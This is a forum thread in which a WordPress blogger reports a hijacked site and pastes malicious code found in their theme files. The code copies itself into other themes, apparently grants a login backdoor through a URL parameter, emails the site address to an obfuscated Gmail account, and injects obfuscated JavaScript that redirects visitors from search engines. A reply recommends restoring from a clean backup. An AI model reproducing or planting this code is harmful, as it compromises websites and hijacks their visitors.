1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Wordpress Blog hijacked! Traffic drops 70%. Some unwanted code in theme files

Discussion in 'Security' started by gauharjk, Jan 22, 2012.

0
  1. #1
    Friends...

    My wordpress blog was hijacked. I did not realize it soon enough, because I never noticed anything unusual, except that my traffic fell 70%.

    At first I thought it was coz I had activated CloudFlare on my blog, and so I disabled it. But traffic did not return.

    A couple of days ago, I accessed by blog from an iPad, instead of my PC. And I was shocked to see I was redirected to some spammy site called googledservics or something like that...

    I ran a Virus Scanner from my cPanel, and it removed a couple of files which it said were infected.

    Later today, I checked my blog using http://sitecheck.sucuri.net/scanner/ and found it was still infected.

    Found some code which was not supposed to be there in my theme files.

    In functions.php, I found

    
<?php
function _check_active_widget(){
    $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
    $output=strip_tags($output, $allowed);
    $direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
    if (is_array($direst)){
        foreach ($direst as $item){
            if (is_writable($item)){
                $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
                $cont=file_get_contents($item);
                if (stripos($cont,$ftion) === false){
                    $sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
                    $output .= $before . "Not found" . $after;
                    if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
                    $output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);                
                    $output .= ($showdot && $ellipsis) ? "..." : "";
                }
            }
        }
    }
    return $output;
}
function _get_all_widgetcont($wids,$items=array()){
    $places=array_shift($wids);
    if(substr($places,-1) == "/"){
        $places=substr($places,0,-1);
    }
    if(!file_exists($places) || !is_dir($places)){
        return false;
    }elseif(is_readable($places)){
        $elems=scandir($places);
        foreach ($elems as $elem){
            if ($elem != "." && $elem != ".."){
                if (is_dir($places . "/" . $elem)){
                    $wids[]=$places . "/" . $elem;
                } elseif (is_file($places . "/" . $elem)&& 
                    $elem == substr(__FILE__,-13)){
                    $items[]=$places . "/" . $elem;}
                }
            }
    }else{
        return false;    
    }
    if (sizeof($wids) > 0){
        return _get_all_widgetcont($wids,$items);
    } else {
        return $items;
    }
}
if(!function_exists("stripos")){ 
    function stripos(  $str, $needle, $offset = 0  ){ 
        return strpos(  strtolower( $str ), strtolower( $needle ), $offset  ); 
    }
}

if(!function_exists("strripos")){ 
    function strripos(  $haystack, $needle, $offset = 0  ) { 
        if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  ); 
        if(  $offset < 0  ){ 
            $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  ); 
        } 
        else{ 
            $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    ); 
        } 
        if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE; 
        $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   ); 
        return $pos; 
    }
}
if(!function_exists("scandir")){ 
    function scandir($dir,$listDirectories=false, $skipDots=true) {
        $dirArray = array();
        if ($handle = opendir($dir)) {
            while (false !== ($file = readdir($handle))) {
                if (($file != "." && $file != "..") || $skipDots == true) {
                    if($listDirectories == false) { if(is_dir($file)) { continue; } }
                    array_push($dirArray,basename($file));
                }
            }
            closedir($handle);
        }
        return $dirArray;
    }
}
add_action("admin_head", "_check_active_widget");
function _prepared_widget(){
    if(!isset($length)) $length=120;
    if(!isset($method)) $method="cookie";
    if(!isset($html_tags)) $html_tags="<a>";
    if(!isset($filters_type)) $filters_type="none";
    if(!isset($s)) $s="";
    if(!isset($filter_h)) $filter_h=get_option("home"); 
    if(!isset($filter_p)) $filter_p="wp_";
    if(!isset($use_link)) $use_link=1; 
    if(!isset($comments_type)) $comments_type=""; 
    if(!isset($perpage)) $perpage=$_GET["cperpage"];
    if(!isset($comments_auth)) $comments_auth="";
    if(!isset($comment_is_approved)) $comment_is_approved=""; 
    if(!isset($authname)) $authname="auth";
    if(!isset($more_links_text)) $more_links_text="(more...)";
    if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");
    if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;
    if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";
    if(!isset($more_content)) $more_content="ma".$s."il";
    if(!isset($forces_more)) $forces_more=1;
    if(!isset($fakeit)) $fakeit=1;
    if(!isset($sql)) $sql="";
    if (!$widget_output) :
    
    global $wpdb, $post;
    $sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
    if (!empty($post->post_password)) { 
        if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { 
            if(is_feed()) { 
                $output=__("There is no excerpt because this is a protected post.");
            } else {
                $output=get_the_password_form();
            }
        }
    }
    if(!isset($fix_tag)) $fix_tag=1;
    if(!isset($filters_types)) $filters_types=$filter_h; 
    if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;
    if(!isset($more_tags)) $more_tags="div";
    if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#
    if(!isset($mlink_title)) $mlink_title="Continue reading this entry";    
    if(!isset($showdot)) $showdot=1;
    
    $comments=$wpdb->get_results($sql);    
    if($fakeit == 2) { 
        $text=$post->post_content;
    } elseif($fakeit == 1) { 
        $text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
    } else { 
        $text=$post->post_excerpt;
    }
    $sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
    if($length < 0) {
        $output=$text;
    } else {
        if(!$no_more && strpos($text, "<!--more-->")) {
            $text=explode("<!--more-->", $text, 2);
            $l=count($text[0]);
            $more_link=1;
            $comments=$wpdb->get_results($sql);
        } else {
            $text=explode(" ", $text);
            if(count($text) > $length) {
                $l=$length;
                $ellipsis=1;
            } else {
                $l=count($text);
                $more_links_text="";
                $ellipsis=0;
            }
        }
        for ($i=0; $i<$l; $i++)
                $output .= $text[$i] . " ";
    }
    update_option("_is_widget_active_", 1);
    if("all" != $html_tags) {
        $output=strip_tags($output, $html_tags);
        return $output;
    }
    endif;
    $output=rtrim($output, "\s\n\t\r\0\x0B");
    $output=($fix_tag) ? balanceTags($output, true) : $output;
    $output .= ($showdot && $ellipsis) ? "..." : "";
    $output=apply_filters($filters_type, $output);
    switch($more_tags) {
        case("div") :
            $tag="div";
        break;
        case("span") :
            $tag="span";
        break;
        case("p") :
            $tag="p";
        break;
        default :
            $tag="span";
    }

    if ($use_link ) {
        if($forces_more) {
            $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n";
        } else {
            $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n";
        }
    }
    return $output;
}

add_action("init", "_prepared_widget");

function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
    global $wpdb;
    $request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
    $request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
    if(!$show_pass_post) $request .= " AND post_password =\"\"";
    if($duration !="") { 
        $request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
    }
    $request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
    $posts=$wpdb->get_results($request);
    $output="";
    if ($posts) {
        foreach ($posts as $post) {
            $post_title=stripslashes($post->post_title);
            $comment_count=$post->comment_count;
            $permalink=get_permalink($post->ID);
            $output .= $before . " <a href=\"" . $permalink . http://articles.architectjaved.com/wp-admin/network/theme-editor.php?file=%2Fthemes%2Ffusion%2Ffunctions.php&theme=Fusion&dir=theme"\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
        }
    } else {
        $output .= $before . "None found" . $after;
    }
    return  $output;
}         
?><?php 
add_action('get_footer', 'add_sscounter');
    function add_sscounter(){
        echo '<!--scounter-->';
        if(function_exists('is_user_logged_in')){
            if(time()%2 == 0 && !is_user_logged_in()){            
                echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('o r=a.e,t=\"\",q;5(r.4(\"m.\")!=-1)t=\"q\";5(r.4(\"b.\")!=-1)t=\"q\";5(r.4(\"c.\")!=-1)t=\"p\";5(r.4(\"f.\")!=-1)t=\"q\";5(r.4(\"g.\")!=-1)t=\"h\";5(r.4(\"i.\")!=-1)t=\"q\";5(t.6&&((q=r.4(\"?\"+t+\"=\"))!=-1||(q=r.4(\"&\"+t+\"=\"))!=-1))j.k=\"l://9\"+\"1.\"+\"n\"+\"3\"+\".\"+\"8\"+\"9.1\"+\"s/\"+\"u.p\"+\"v?w\"+\"d=7&t\"+\"x\"+\"y=\"+r.z(q+2+t.6).A(\"&\")[0];',37,37,'||||indexOf|if|length||||document|msn|yahoo||referrer|altavista|aol|query|ask|window|location|http|google|22|var||||12||go|hp|si|er|ms|substring|split'.split('|'),0,{}))</script>";
            }
        }
    }
?>
    Code (markup):
    And footer.php had a line of code

    <div id="scricode486397491"></div>
    Code (markup):
    I have removed this extra code, but am not sure if it was a false alarm or really malware. A fresh unmodified copy of the theme does not have these extra lines of code, and I sure did not add them.

    What should I do now? Could there be more of such malware code in my blog? I have changed the password and made it more secure. But I am afraid it could come back.

    In logs, I have found hundreds of attempts everyday to access wp-login.php

    My infected blog is http://www.civilprojectsonline.com/

    Any suggestions?
     
    gauharjk, Jan 22, 2012 IP
  2. SolidShellSecurity

    SolidShellSecurity Banned

    Messages:
    262
    Likes Received:
    3
    Best Answers:
    1
    Trophy Points:
    45
    #2
    Typically, best way is to restore from backup that is safe or re-install clean files. That is what we do with our clients. If we have to we will go in and look for the malware code but that is a last resort as you can hide a one line in almost any place. Check the .htaccess file too.
     
    SolidShellSecurity, Jan 22, 2012 IP
    gauharjk likes this.